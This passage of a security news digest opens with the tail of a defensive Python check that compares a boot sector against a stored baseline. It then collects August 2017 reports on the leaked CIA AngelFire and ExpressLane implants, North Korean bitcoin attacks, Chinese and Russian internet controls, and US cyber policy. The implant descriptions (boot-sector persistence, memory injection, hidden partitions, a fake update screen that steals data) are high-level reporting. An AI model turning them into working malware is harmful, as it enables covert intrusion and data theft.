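BASELINE_VBR = build_sample_vbr(0x90)          # "known good" image taken at install time
_tampered = bytearray(BASELINE_VBR)
_tampered[CODE_START:CODE_START + 16] = b"\xCC" * 16   # 16 bytes of boot code replaced
TAMPERED_VBR = bytes(_tampered)


if __name__ == "__main__":
    for name, image in (("baseline", BASELINE_VBR), ("tampered", TAMPERED_VBR)):
        result = check_vbr(image, BASELINE_VBR)
        print(f"{name}: {'clean' if not result else '; '.join(result)}")
```

In practice the baseline image is captured right after installation and stored off-host, since a bootkit that can rewrite the VBR can also rewrite a baseline kept on the same disk.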

According to the AngelFire user guide, the tool has a small footprint and comes with two installer versions, namely an executable and a fire-and-collect .dll installer. The implant framework is compatible with 32-bit Windows XP and Windows 7, and with 64-bit Windows Server 2008 R2 and Windows 7.

The tool is also plagued by a variety of issues, the leaked documents say, including the lack of support for .dll persistence on Windows XP, an imperfect heuristic algorithm, an incorrectly configured SEH environment during driver load, and the inability to dynamically determine the path of svchost.exe, among others.


AngelFire: CIA Malware Infects System Boot Sector to Hack Windows PCs

31.8.2017 thehackernews BigBrothers

A team of hackers at the CIA, the Central Intelligence Agency, allegedly used a Windows hacking tool against its targets to gain persistent remote access.
As part of its Vault 7 leaks, WikiLeaks today revealed details about a new implant developed by the CIA, dubbed AngelFire, to target computers running Windows operating system.
The AngelFire framework implants a persistent backdoor on the target Windows computers by modifying their partition boot sector.
The AngelFire framework consists of the following five components:
1. Solartime — it modifies the partition boot sector to load and execute the Wolfcreek (kernel code) every time the system boots up.
2. Wolfcreek — a self-loading driver (kernel code that Solartime executes) that loads other drivers and user-mode applications.
3. Keystone — a component that utilizes DLL injection technique to execute the malicious user applications directly into system memory without dropping them into the file system.
4. BadMFS — a covert file system that attempts to install itself in non-partitioned space available on the targeted computer and stores all drivers and implants that Wolfcreek starts.
5. Windows Transitory File system — a new method of installing AngelFire, which allows the CIA operator to create transitory files for specific tasks like adding and removing files to AngelFire, rather than laying independent components on disk.
According to a user manual leaked by WikiLeaks, AngelFire requires administrative privileges on a target computer for successful installation.
The 32-bit version of the implant works against Windows XP and Windows 7, while the 64-bit implant can target Windows Server 2008 R2 and Windows 7.
Previous Vault 7 CIA Leaks
Last week, WikiLeaks published another CIA project, dubbed ExpressLane, which detailed the spying software the CIA used to spy on its intelligence partners around the world, including the FBI, DHS and the NSA.
Since March, WikiLeaks has published 22 batches of the "Vault 7" series, including the latest leak, last week's leak, and the following batches:
CouchPotato — A CIA project that revealed its ability to spy on video streams remotely in real-time.
Dumbo — A CIA project that disclosed its ability to hijack and manipulate webcams and microphones to corrupt or delete recordings.
Imperial — A CIA project that revealed details of 3 CIA-developed hacking tools and implants designed to target computers running Apple Mac OS X and different flavours of Linux OS.
UCL/Raytheon — An alleged CIA contractor that analysed in-the-wild advanced malware and submitted at least five reports to the agency to help it develop its malware.
Highrise — An alleged CIA project that allowed the US agency to stealthily collect and forward stolen data from compromised smartphones to its server via SMS messages.
BothanSpy and Gyrfalcon — Two alleged CIA implants that allowed the spy agency to intercept and exfiltrate SSH credentials from targeted Windows and Linux computers using different attack vectors.
OutlawCountry — An alleged CIA project that allowed the agency to hack and remotely spy on computers running Linux operating systems.
ELSA — Alleged CIA malware that tracks geo-location of targeted laptops and computers running the Microsoft Windows OS.
Brutal Kangaroo — A tool suite for Microsoft Windows OS used by the CIA agents to target closed networks or air-gap computers within an organisation or enterprise without requiring any direct access.
Cherry Blossom — A framework employed by the agency to monitor the Internet activity of the targeted systems by exploiting flaws in Wi-Fi devices.
Pandemic — A CIA project that allowed the spying agency to turn Windows file servers into covert attack machines that can silently infect other PCs of interest inside the same network.
Athena — A spyware framework that the agency designed to take full control over infected Windows systems remotely and that works against every version of the Windows OS, from Windows XP to Windows 10.
AfterMidnight and Assassin — Two alleged CIA malware frameworks for the Microsoft Windows platform that are meant to monitor and report back actions on the infected remote host PC and execute malicious actions.
Archimedes — Man-in-the-middle (MitM) attack tool allegedly developed by the agency to target computers inside a Local Area Network (LAN).
Scribbles — Software allegedly designed to embed 'web beacons' into confidential documents, allowing the CIA agents to track insiders and whistleblowers.
Grasshopper — A framework which allowed the spying agency to easily create custom malware for breaking into Microsoft's Windows OS and bypassing antivirus protection.
Marble — Source code of a secret anti-forensic framework used by the agency to hide the actual source of its malware.
Dark Matter — Hacking exploits the spying agency designed to target iPhones and Macs.
Weeping Angel — Spying tool used by the CIA agents to infiltrate smart TVs, transforming them into covert microphones.
Year Zero — CIA hacking exploits for popular hardware and software.


North Korea Accused of Stealing Bitcoin to Bolster Finances

30.8.2017 securityweek BigBrothers
North Korea (DPRK) appears to be targeting bitcoin (both users and exchanges) as a means to counter the increasing effect of international sanctions. Earlier this month the UN Security Council unanimously imposed new sanctions targeting the country's primary exports. Dwindling coal exports to China will be particularly severe, and DPRK's export revenues will likely be slashed by $1 billion.

Recent cyber-attacks against South Korean bitcoin exchanges are now being blamed on North Korea. Radio Free Asia (RFA) -- a non-profit East Asian News Agency -- has reported that DPRK has already launched three cyber-attacks on bitcoin exchanges in South Korea, and one in Europe. Details, including timings, are sparse -- so it is quite possible that the July hack of a Bithumb employee is included, and here attributed to North Korea.

This basic premise that North Korea is targeting bitcoins is reiterated in a report from the United Press International news agency. It says, "The CWIC Cyber Warfare Research Center in South Korea stated a domestic exchange for bitcoin, the worldwide cryptocurrency and digital payment system, has been the target of an attempted hacking... CWIC's Simon Choi said it is 'not only one or two exchanges where attack attempts have been made'."

The precise status of the Cyber Warfare Research Center in South Korea is not explained. Nevertheless, Choi is credited with claiming that phishing emails have been targeting not just bitcoin exchanges, but that "Startups that use blockchain, financial technology sector companies as well as others, may have been the target." The report adds, "According to CWIC, the malicious code attached to the emails was identical to viruses of North Korean origin."

Despite the lack of detail, these two reports have been elaborated by bitcoin news publications. One leads with "State-sponsored North Korean hackers have been accused of targeting South Korean bitcoin exchanges with cyberattacks and hacking attempts by a South Korean official."

Frankly, it is not at all clear how much veracity can be attached to the reports -- there is no detail, no proof, no timings, and no definition of the status of CWIC (which is variously described as the Cyber Warfare Research Center and the Cyber Warfare Intelligence Center). However, the idea is certainly supported by motive and means: North Korea has both. In stealing bitcoins, the beleaguered nation can simultaneously bolster its finances and obtain 'foreign currency' that cannot be blocked by western governments. Merely surmising that this is now at the least semi-official policy of the cyber army of North Korea may not be far from the truth.

If cyber-attackers are spear-phishing bitcoin users/holders, then it presupposes knowledge of the targets' email addresses. Choi has apparently suggested that "North Korea has somehow gained details about all those individuals who regularly do trading with BTC exchanges." However, this could easily be explained if it was indeed North Korea behind the July Bithumb breach. At that time, roughly 31,000 users – representing 3 percent of the company’s total number of customers – had their email and phone information stolen.

In a blog post, Ross Rustici, Cybereason's senior director of intelligence services, suggests that any such North Korean hacking policy will have good, bad, and ugly ramifications.

The good, he suggests, is "it means that the DPRK threat, in totality, will be degraded. By focusing on currency generation, groups that would otherwise be gearing up for network attacks or traditional espionage will be diverted to filling out the bottom line."

The bad, he wrote, is that "Banking, financial institutions, and currency exchanges are likely to see a steady increase in malicious and sophisticated intrusion attempts. These attacks are likely to focus on institutions in South Korea, America and Japan to serve the dual purpose of political retaliation and revenue generation; but would likely also apply wherever network security is largely weak."

The ugly, however, is particularly ugly. "Given current tensions and the potential desire to retaliate for perceived assaults on the regime," comments Rustici, "the DPRK has the latent capacity to conduct a heist and destroy the network on the way out. The likelihood of this combination happening is low, but it is not zero."

At this point, it would be worth considering WannaCry, largely attributed to North Korea. The very poor process of ransom collection built into the original WannaCry led some researchers to conclude its real purpose was destructive: ransomware without decryption is effectively a cyberweapon wiper. NotPetya was more clearly a disguised cyberweapon, although in this instance more likely an attack by Russia against the Ukraine.


China Enforces Real-Name Policy to Regulate Online Comments

29.8.2017 thehackernews BigBrothers

If you reside in China, your Internet life within the borders will soon be even more challenging.
Last Friday, China's top Internet regulator announced a new set of rules that would force citizens to post comments using their real-world identities on Internet forums and other web platforms.
Yes, you heard that right. Anonymity is about to die in the country.
The Cyberspace Administration of China (CAC) will start officially enforcing the new rules from October 1, 2017, requiring website operators and online forum service providers to request and verify real names and other personal information from users when they register, and to immediately report illegal content to the authorities.
According to the CAC, the following content would be considered unlawful and forbidden from being published online:
Opposing the basic principles as defined in the Constitution
Endangering national security
Damaging nation's honor and interests
Inciting national hatred, ethnic discrimination and undermining national unity
Undermining nation's religious policies and promoting cults
Spreading rumours, disrupting social order and destroying social stability
Spreading pornography, gambling, violence, murder, terror or abetting a crime
Insulting or slandering others and infringing upon others
Any other content that is prohibited by laws and administrative regulations
Well, the list covers almost everything.
While China has already enforced "real-name registration" rules on the leading online platforms like WeChat and Weibo for a few years, the latest regulations would cover the remaining parts of the online world, including online communities and discussion forums.
The new rules will be imposed on websites, smartphone apps, interactive communications platforms, and any communication platform that features news or functions to "mobilise society." In fact, news sites even have to moderate comments before publishing.
These new regulations follow China's 14-month-long crackdown on VPNs (Virtual Private Networks), which requires VPN service providers in the country to obtain prior government approval, making most VPN vendors in the country of 730 million Internet users illegal.
Late last month, Apple also removed some VPN apps, including ExpressVPN and Star VPN, from its official Chinese app store to comply with the government crackdown that will remain in place until March 31, 2018.


India and Pakistan hit by state-sponsored cyber espionage campaign
29.8.2017 securityaffairs BigBrothers

The security firm Symantec has discovered another cyber espionage campaign against India and Pakistan which is likely to be state-sponsored.
Security experts at Symantec have uncovered a sustained cyber spying campaign against Indian and Pakistani entities involved in regional security issues.

The nature of the targets and the threat actors’ techniques suggest it is a state-sponsored campaign likely powered by several groups of hackers.

“The campaign appeared to be the work of several groups, but tactics and techniques used suggest that the groups were operating with “similar goals or under the same sponsor”, probably a nation state, according to the threat report, which was reviewed by Reuters. It did not name a state.” reported Reuters.

According to a threat intelligence report Symantec sent to clients in July, the cyber espionage campaign dates back to October 2016.

The experts suspect the involvement of several groups that share TTPs and operate with “similar goals or under the same sponsor.”

The cyber espionage campaign was uncovered while tensions in the region are rising.

India’s military is intensifying operational readiness along the border with China following a face-off in Bhutan near their disputed frontier, at the same time tensions are rising between India and Pakistan over the disputed Kashmir region.

The threat actors appear focused on governments and militaries with operations in South Asia and interests in regional security issues. Attackers leverage the “Ehdoor” backdoor to gain control over infected machines.
Backdoor.Ehdoor is a Trojan horse first spotted in September 2016; it was initially used to target government, military and military-affiliated entities in the Middle East and elsewhere.
The Ehdoor backdoor opens a back door, steals information, and downloads potentially malicious files onto the compromised computer.
“There was a similar campaign that targeted Qatar using programs called Spynote and Revokery,” said a security expert, who requested anonymity. “They were backdoors just like Ehdoor, which is a targeted effort for South Asia.”

According to the Symantec report, the attackers used decoy documents related to security issues in South Asia to deliver the malware. The malware was also being used to target Android devices.

“The documents included reports from Reuters, Zee News, and the Hindu, and were related to military issues, Kashmir, and an Indian secessionist movement.” Reuters reports.

“The malware allows spies to upload and download files, carry out processes, log keystrokes, identify the target’s location, steal personal data, and take screenshots, Symantec said, adding that the malware was also being used to target Android devices.”


Gulshan Rai, the director general of CERT-In, has not commented on the cyber espionage campaign, but he said: “We took prompt action when we discovered a backdoor last October after a group in Singapore alerted us.”

According to malware researchers at Symantec, the backdoor was continuously improved over time to implement “additional capabilities” for spying operations.

“A senior official with Pakistan’s Federal Investigation Agency said it had not received any reports of malware incidents from government information technology departments. He asked not to be named due to the sensitivity of the matter.” continues the Reuters report.

“A spokesman for FireEye, another cybersecurity company, said that based on an initial review of the malware, it had concluded that an internet protocol address in Pakistan had submitted the malware to a testing service. The spokesman requested anonymity, citing company policy.”


U.S. Government Cybersecurity Ranks 16th Out of 18 Industry Sectors

28.8.2017 securityweek BigBrothers
The U.S. state and federal government's cybersecurity standing is ranked 16th of 18 industry sectors in a new report. This is a very small improvement on last year's comparable position, which was 18th out of 18; but it still paints a grim picture of public sector readiness to fight cybercrime and cyber espionage.

The 2017 U.S. State and Federal Government Cybersecurity report (PDF) was just published by SecurityScorecard, a firm that seeks to help businesses manage third- and fourth-party risk (the supply chain). It does this by collecting and analyzing subject data through its own data engine, ThreatMarket -- which uses 10 categories such as web applications, network security, DNS health, patching cadence and what it calls 'hacker chatter'.

SecurityScorecard is based in New York. It was founded in 2013, and raised $12.5 in Series A funding led by Sequoia Capital in 2015. Its stated mission is "to empower every organization with collaborative security intelligence."

For this report, SecurityScorecard analyzed more than 500 state and local government agencies, and compared the results, as a group, to 17 other industry sectors. Although there has been a slight improvement over last year's results, government organizations are particularly weak in network security (13th), application security (11th), leaked credentials (12th), patching cadence (16th), endpoint security (17th), IP reputation (16th), and hacker chatter (18th).

Government is, however, performing well in three of the 10 categories: DNS health (2nd), social engineering (3rd), and cubit score (2nd). The cubit score is a measure of exposed administrative portals and subdomains. Nevertheless, the only two sectors performing worse than government overall are Telecommunications and Education. Surprisingly, perhaps, regulation doesn't put the heavily regulated industries at the top of the chart: transportation, healthcare and energy are all among the poorest performing industries, while financial services only ranks at fifth position.

Within the 500 government offices analyzed, the Federal Reserve, the Secret Service and the IRS are all -- reassuringly -- within the top ten performing agencies. In fact, among the larger organizations, the top four agencies are the IRS, the Congressional Budget Office, the Federal Trade Commission and the Defense Logistics Agency.

The report does not specify the poorest performing agencies -- in fact, the report rarely specifies individual agencies, more usually saying only 'federal agency', or 'county (or city) in [state]'.

Commenting on the report, Sam Kassoumeh, COO and co-founder at SecurityScorecard, said, "On an almost daily basis, the institutions that underpin the nation's election system, military, finances, emergency response, transportation, and many more, are under constant attack from nation-states, criminal organizations, and hacktivists. Government agencies provide mission-critical services that, until they are compromised, most people take for granted. This report is designed to educate elected officials, agency leadership, as well as government security professionals about the state of security in the government sector."

In reality, however, reports like this can only provide indicators of overall security -- this one relies on the interpretation of external factors without being able to analyze the internal security. For example, in the leaked credentials category, Government ranks 12th out of 18. "SecurityScorecard," says the report, "maps the information [from password dumps] back to the companies who own the data or associated email accounts that are connected to the leaked information. By doing so, SecurityScorecard is able to assess the likelihood that an organization will succumb to a security incident due to the leaked information."

But it doesn't know the internal processes and controls of the organization concerned -- whether, for example, all passwords have been changed since the leak, or whether new multi-factor and behavioral authentication controls have been introduced.

Similarly, an organization's susceptibility to social engineering (here government scores well at 3rd out of the 18 sectors) is measured by monitoring social media practices to see how easy it would be to build an employee profile that can be phished or spear-phished. But this doesn't measure the existence or effectiveness of the organization's internal awareness training, nor any anti-spam or anti-phishing controls. A more accurate way to measure social engineering susceptibility would be to measure employees' phishing clicks through simulated phishing attacks -- which SecurityScorecard cannot do.

This doesn't mean that the report has no value. It does -- but it should, perhaps, be taken with a pinch of salt. "I personally like this type of reporting and feel we need more such metrics," comments Martin Zinaich, the information security officer at the City of Tampa. "However, the efficacy of such is mixed."

He gives the example of a local TV station running the Qualys SSL scanner against a number of local governments. "One entity scored an F," he said. "So, the TV station ran a number of stories about them failing -- which of course caused political havoc."

The reality was different. "That failing score was based on support for an outdated cipher. Now SSL ciphers negotiate to the highest level both sides support. To have a material breach someone would have had to have an outdated browser and then a third party would have to perform a man-in-the-middle attack on that outdated connection. The reward of which would have probably been seeing a water bill." The danger comes in drawing black and white conclusions from insufficient data.

Zinaich believes it is all part of what he calls the "Security Theatre". At one level, the SecurityScorecard report is a sales pitch marketing the SecurityScorecard third-party risk service. But on another level, it also provides some genuine indicators of security posture that are valid provided they are treated as indicators rather than statements of fact. It is worth noting, for example, that rival third-party risk management company BitSight rated the federal government as "the second highest performing sector" out of six sectors in September 2015.


China Demands Internet Platforms Verify Users' True Identity

28.8.2017 securityweek BigBrothers
China has ordered the country's internet platforms to verify users' true identity before letting them post online content, the latest step by authorities to tighten policing of the web.

All social networking sites and discussion forums must "check the real identity" of their users before they can post online content and comments, under new regulations published Friday by the Cyberspace Administration of China.

The platforms will also have to strengthen their oversight over all published information, deleting all illegal content while also alerting authorities to the postings.

The new guidelines take effect October 1.

China already had laws requiring companies to verify users' identities, but they were applied in a fragmented and incomplete way.

But forcing online posters to identify themselves -- which will probably require scanning a government-issued ID as proof of identity -- makes it much more difficult to post online anonymously.

China already tightly controls the internet, aggressively blocking sites of which it disapproves and curbing politically sensitive online commentary, such as criticism of the government.

The new regulation was adopted as part of a cybersecurity law that took effect in June, which bans internet users from publishing a wide variety of information.

That covers anything that damages "national honour", "disturbs economic or social order" or is aimed at "overthrowing the socialist system".

The law also requires online platforms to get a license to post news reports or commentary about the government, economy, military, foreign affairs, and social issues.

Since 2013, China has imposed prison sentences on users whose messages are deemed "defamatory".

But new restrictive measures have multiplied in recent months, ahead of the Communist Party's autumn congress during which President Xi Jinping is expected to be re-elected.

China has enforced new rules on what is permissible content, with content such as celebrity gossip blogs and online video streaming sites hit by the regulations.

The authorities have also stepped up efforts to clamp down on virtual private networks (VPNs), software that allows people to circumvent the Great Firewall.


Hundreds of Russians Protest Tighter Internet Controls

28.8.2017 securityweek BigBrothers

About 1,000 Russians braved pouring rain in Moscow on Saturday to demonstrate against the government's moves to tighten controls on internet use, with police arresting about a dozen protesters.

Shouting slogans such as "Russia will be free" and "Russia without censorship", the protesters were escorted by several police officers, in a march authorised by local authorities.

Several were also marching in support of Khudoberdi Nurmatov, a reporter for the Russian opposition newspaper Novaya Gazeta, who faces deportation back to Uzbekistan over allegedly violating immigration laws.

Some of those were arrested, according to OVD-Info, a rights group that monitors detentions of activists, while an AFP photographer saw two protesters carrying rainbow flags detained.

In July, Russia's parliament voted to outlaw web tools that let internet users sidestep official bans of certain websites.

It allows telecommunications watchdog Roskomnadzor to compile a list of so-called anonymiser services and prohibit any that fail to respect the bans, while also requiring users of online messaging services to identify themselves with a telephone number.

"Innovation and technology will win! We will defend our freedoms!" one protester said, according to a broadcast of the march on YouTube.

Russia's opposition groups rely heavily on the internet to make up for their lack of access to the mainstream media.

But the Russian authorities have been clamping down on such online services, citing security concerns.

In June, Russian officials threatened to ban the Telegram messaging app after the FSB security service said it had been used by the attackers responsible for the deadly Saint Petersburg metro bombing in April.


WikiLeaks: CIA Secretly Collected Data From Liaison Services

25.8.2017 securityweek BigBrothers
WikiLeaks has published another round of Vault 7 documents, this time describing a tool allegedly used by the U.S. Central Intelligence Agency (CIA) to secretly collect biometric data from the agency’s liaison services.

The leaked documents, marked as “secret,” appear to reveal that the CIA’s Office of Technical Services (OTS) and Identity Intelligence Center (I2C), both part of the agency’s Directorate of Science and Technology, have provided liaison services with a system that collects biometric information.

According to WikiLeaks, these liaison services include other U.S. government agencies, such as the National Security Agency (NSA), the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI).

In order to ensure that liaison services share the collected biometric data, the CIA has developed a tool called ExpressLane, which secretly copies the data collected by the biometric software and disables this software if continued access is not provided to the agency.

The documents show that ExpressLane is installed on the targeted system by an OTS officer claiming to perform an upgrade to the biometric system from a USB drive. ExpressLane displays a bogus update screen for a period of time specified by the agent, while in the background the targeted biometric data is compressed, encrypted and copied to the officer’s USB drive.

The files copied to the USB drive are later extracted at headquarters using a different utility called ExitRamp.

Another feature of ExpressLane allows the agency to ensure that the biometric software is disabled after a specified number of days unless action is taken. When the tool is installed, a kill date, which specifies when the biometric software will stop functioning, is set (the default value is 6 months in the future). If an agent does not return with the ExpressLane USB drive within that period, the license for the biometric software expires. Whenever ExpressLane is run on the targeted system, the kill date is extended.

This helps the CIA ensure that the collected biometric data ends up in its possession, and provides a way for the agency to disable the biometric software if access is no longer granted.

The documents leaked by WikiLeaks are dated 2009 and the instructions they contain are mainly for Windows XP. It’s unclear if the tool continues to be used and what improvements have been made to it if it’s still maintained.

According to WikiLeaks, the core components of the biometric system are made by Cross Match, a Florida-based company that provides biometric software to law enforcement and intelligence agencies. The company made headlines in 2011 when reports claimed that one of its field devices had been used to identify al-Qaeda leader Osama bin Laden.

WikiLeaks has published documents describing several tools allegedly developed by the CIA, including for hacking OS X systems (Imperial), intercepting SMS messages on Android devices (HighRise), redirecting traffic on Linux systems (OutlawCountry), stealing SSH credentials (BothanSpy), spreading malware on an organization’s network (Pandemic), locating people via their device’s Wi-Fi (Elsa), hacking routers and access points (Cherry Blossom), and accessing air-gapped networks (Brutal Kangaroo).


Report Suggests 'Fleeting Window' to Prevent Major Cyber Attack on Critical Infrastructure

25.8.2017 securityweek BigBrothers
The National Infrastructure Advisory Council (NIAC) published a draft report this week titled Securing Cyber Assets: Addressing Urgent Cyber Threats to Critical Infrastructure (PDF). The report warns there is a narrow and fleeting window to prepare for and prevent "a 9/11-level cyber-attack" against the U.S. critical infrastructure.

The purpose of NIAC is to advise the President on the cybersecurity of critical services, such as banking, finance, energy and transportation. The Council was created in 2001 by President Bush's executive order 13231, and its functioning was extended until September 2017 by Obama's 2015 executive order 13708. It can comprise up to 30 members chosen by the President.

The new report makes 11 recommendations to improve the security of the critical infrastructure. Overall, it presents a damning indictment on U.S. readiness. "We believe the U.S. government and private sector collectively have the tremendous cyber capabilities and resources needed to defend critical private systems from aggressive cyber-attacks -- provided they are properly organized, harnessed, and focused. Today, we're falling short."

There is an intriguing backdrop to this report -- on the day before its publication, seven of the existing 27 members resigned. Resignations among President Trump's advisors are common, with causes ranging from the political (such as Tesla's Elon Musk and Disney's Robert Iger resigning from Trump's business panel over the withdrawal from the Paris climate accord) to the 'cultural' (such as those who left the Manufacturing Jobs Initiative and the Strategic and Policy Forum over the President's Charlottesville comments).

In their NIAC resignation letter (seen by Roll Call), the Paris accord and Charlottesville were again mentioned, together with the President's 'attacks' on CEOs who do resign from his advisory panels. However, the letter also noted the President's "insufficient attention to the growing threats to the cybersecurity of the critical systems upon which all Americans depend..." It is not clear whether and to what extent -- if any -- these resignations relate to the President and NIAC.

That said, the NIAC report has been received by the industry with little enthusiasm and much reservation. For example, Patrick Coyle (owner and author of Chemical Facility Security News) questions the validity of the 9/11 reference. He simply does not believe that the main threat is "the grand cyber-attack; the infamous cyber pearl harbor." A grand attack, he told SecurityWeek, will require a grand response; "a kinetic response that few would be willing to risk."

Coyle believes that the more likely threat "would be a number of smaller attacks that weakened the economy and reduced the will of the American people to resist. Such attacks would be much less likely to garner a kinetic response, so the risk to the attacker would be much less."

Sqrrl director Matt Zanderigo calls it a "good report with solid, actionable recommendations;" but adds that many of the recommendations are not new. "This is less an issue of strategy and more about execution," he told SecurityWeek. "It is good to see that the final recommendation is focused on tracking activity and performance against these recommendations, as I think that will be key and should be done as transparently and publicly as possible."

But there remains a potentially fatal flaw: NIAC's recommendations are all voluntary, albeit with incentives. "The problem with voluntary measures and incentives for critical infrastructure owners," he said, "is that the national consequences of a cyber attack on certain key pieces of critical infrastructure far outweigh the local impacts for that owner/operator. This mismatch between local risk and national risk for cyber-attacks on critical infrastructure is the type of market inefficiency that is typically best filled by regulation."

The lack of innovative ideas also concerns Chris Roberts, chief security architect at Acalvio. "Frankly, eleven key recommendations are about five too many," he said. "Let's face it, we've all been screaming about critical infrastructure for years, keeping the message very simple -- and this 45-page report comes out, says the same thing and then, heaven forbid, puts the remit for action into the government's hands."

He has more specific concerns. Recommendation #3 states, "Identify best-in-class SCANNING TOOLS AND ASSESSMENT PRACTICES, and work with owners and operators of the most critical networks to scan and sanitize their systems on a voluntary basis;" and then calls for action from the National Security Council, the Department of Homeland Security, and Congress.

Roberts' opinion is scathing. "Seriously, we are going to let Congress work out what scanning tools we should use? What idiot came up with that one?"

Perhaps the biggest disappointment is over critical infrastructure threat intelligence sharing. Recommendation #2 calls for a private-sector-led pilot "to test public-private and company-to-company information sharing of cyber threats at network speed." This would be augmented by Recommendation #7: "Establish clear protocols to RAPIDLY DECLASSIFY CYBER THREAT INFORMATION and proactively share it with owners and operators of critical infrastructure."

In short, private industry needs to share threat information among itself better than it does, while government needs to share its intelligence with private industry. On company-to-company sharing, Roberts comments, "Oh good, another feed for people to ignore, to not pay attention to, or too little information too late for anyone to be able to do anything with."

Nor does he believe that government sharing will come to much. "Telling the DOE, DHS, ODNI and SICC to work with separating communications is going to be interesting especially as most of them, honestly, can't communicate effectively today."

Jason Kent, CTO at AsTech, believes these two recommendations should be treated as one. It's not going to be easy. "When something about an adversary or attacker is learned, that becomes a carefully guarded secret." Government agencies do not like sharing their secrets, while individual companies often dare not because of the complexity of existing legislation.

Kent's recommendation would be to start with the government agencies since they can be more easily compelled than private industry. "Imagine if you could get all these guys to collaborate: DOE, DHA, ODNI, NSC, SICC. What is the conduit through which they should speak? We don't currently have a way for them to share threat intel. Obviously an impartial 3rd party is needed to facilitate the communication, but how do we create one with nothing like this built today?"

His solution would be a national cyber security council "that basically takes threat data from our nation's various infrastructures, combined with feeds from private organizations, that is consumed and analyzed for patterns and risks... True security," he says, "comes from the security of all, not the one. We need to change our focus from protecting one asset at a time to protecting all assets at risk." To solve this, he proposes a new third-party organization that is trusted by both public and private organizations able to share solutions rather than just threats.

The overriding problem with the NIAC report is the perception that it repeats known problems and proposes new studies without offering realistic solutions. In summary, a common feeling within the industry is that the NIAC report is too complicated, says little that is new, and provides voluntary recommendations that will likely be ignored for the same business reasons that existing recommendations are already ignored.


Here's How CIA Spies On Its Intelligence Liaison Partners Around the World
24.8.2017 thehackernews BigBrothers

WikiLeaks has just published another Vault 7 leak, revealing how the CIA spies on its intelligence partners around the world, including the FBI, DHS and NSA, to covertly collect data from their systems.
The CIA offers a biometric collection system, with predefined hardware, operating system and software, to its intelligence liaison partners around the world, which helps them voluntarily share the biometric data collected on their systems with each other.
But since no agency shares all of its collected biometric data with the others, the Office of Technical Services (OTS) within the CIA developed a tool to secretly exfiltrate data collections from their systems.
The newly revealed CIA project, dubbed ExpressLane, details the spying software that CIA agents manually install under the guise of a routine upgrade to the biometric system.
The leaked CIA documents reveal that the OTS officers who maintain biometric collection systems installed at liaison services visit their premises and secretly install the ExpressLane Trojan while displaying an "upgrade Installation screen with a progress bar that appears to be upgrading the biometric software."
"It will overtly appear to be just another part of this system. It’s called: MOBSLangSvc.exe and is stored in \Windows\System32," leaked CIA documents read.
"Covertly it will collect the data files of interest from the liaison system and store them encrypted in the covert partition on a specially watermarked thumb drive when it is inserted into the system."
ExpressLane includes two components:
Create Partition — This utility allows agents to create a covert partition on the target system where the collected information (in compressed and encrypted form) will be stored.
Exit Ramp — This utility lets the agents steal the collected data stored in the hidden partition using a thumb drive when they revisit.

The latest version, ExpressLane 3.1.1, removes itself six months after installation by default in an attempt to erase its footprints, though OTS officers can change this date.
The biometric software system that the CIA offers is based on a product from Cross Match, a US company specializing in biometric software for law enforcement and the intelligence community, whose product was also used to "identify Osama bin Laden during the assassination operation in Pakistan."
Previous Vault 7 CIA Leaks
Last week, WikiLeaks published another CIA project, dubbed CouchPotato, which revealed the CIA's ability to spy on video streams remotely in real-time.
Since March, WikiLeaks has published 21 batches in the "Vault 7" series, including this week's and last week's leaks, along with the following:
Dumbo — A CIA project that disclosed the CIA's ability to hijack and manipulate webcams and microphones to corrupt or delete recordings.
Imperial — A CIA project that revealed details of at least three CIA-developed hacking tools and implants designed to target computers running Apple Mac OS X and different flavours of Linux.
UCL/Raytheon — An alleged CIA contractor that analysed in-the-wild malware and hacking tools and submitted at least five reports to the spying agency to help it develop its own malware.
Highrise — An alleged CIA project that allows the spying agency to stealthily collect and forward stolen information from compromised phones to its server via SMS messages.
BothanSpy and Gyrfalcon — Two alleged CIA implants that allowed the US agency to intercept and exfiltrate SSH credentials from targeted Windows and Linux computers.
OutlawCountry — An alleged CIA project that let the agency hack and remotely spy on computers running Linux.
ELSA — Alleged CIA malware that tracks the location of targeted laptops and PCs running Microsoft Windows.
Brutal Kangaroo — A Microsoft Windows tool suite used by the agents to target closed networks or air-gapped PCs within an organisation or enterprise without requiring any direct access.
Cherry Blossom — A CIA framework employed by its agents to monitor the Internet activity of target systems by exploiting bugs in Wi-Fi devices.
Pandemic — A CIA project that let the spying agency turn Windows file servers into covert attack machines that can silently infect other systems of interest inside the same network.
Athena — A spyware framework that the secretive US agency uses to take full remote control of infected Windows machines, and which works against every version of Windows from Windows XP to Windows 10.
AfterMidnight and Assassin — Two alleged CIA malware frameworks for the Windows platform designed to monitor and report back actions on the infected remote host and execute malicious actions.
Archimedes — A man-in-the-middle attack tool allegedly developed by the US agency to target systems inside a local area network (LAN).
Scribbles — Software allegedly designed to embed 'web beacons' into confidential documents, allowing the agents to track insiders and whistleblowers.
Grasshopper — A framework that let the spying agency easily create custom malware for breaking into Microsoft Windows and bypassing antivirus software.
Marble — Source code of a secret anti-forensic tool used by the US agency to hide the actual source of its malicious payloads.
Dark Matter — Hacking exploits the US spying agency designed and used to target iPhones and Macs.
Weeping Angel — A spying tool used by CIA agents to infiltrate smart TVs and transform them into covert microphones.
Year Zero — CIA hacking exploits for popular hardware and software.


The Role of America's New Unified Cyber Warfare Command

23.8.2017 securityweek BigBrothers
U.S. President Donald Trump on Aug. 18 announced the elevation of the U.S. Cyber Command (USCYBERCOM/CyberCom) to a Unified Combatant Command. This brings American offensive and defensive cyber operations out from under the implicit oversight of the NSA and puts them on an equal footing -- with major implications for the U.S. national cyber security posture.

A Unified Command is a structure that acknowledges an inter-relationship with another authority -- in this case, primarily the U.S. National Security Agency (NSA). However, Trump's statement adds, "The Secretary of Defense is examining the possibility of separating United States Cyber Command from the National Security Agency." For the time being at least, both the NSA and Cyber Command will continue under the same leadership, currently Admiral Michael Rogers.

Rogers has always been against a separation. The United States Cyber Command was formed in 2009, sharing the resources, headquarters and commander with the NSA. It achieved operational capability in late 2010. The idea was that military hackers could learn from the NSA's hackers. However, as indications of international cyber war have increased, the organizations' objectives have diverged: the NSA's fundamental purpose is to collect intelligence, while USCYBERCOM's role is to achieve military objectives. Rogers fears that such military objectives, undertaken independently, could interfere with the process of intelligence gathering.

Trump, however, clearly feels that the time is ripe. "The elevation of United States Cyber Command demonstrates our increased resolve against cyberspace threats and will help reassure our allies and partners and deter our adversaries," he said. "Through United States Cyber Command, we will tackle our cyberspace challenges in coordination with like-minded allies and partners as we strive to respond rapidly to evolving cyberspace security threats and opportunities globally."

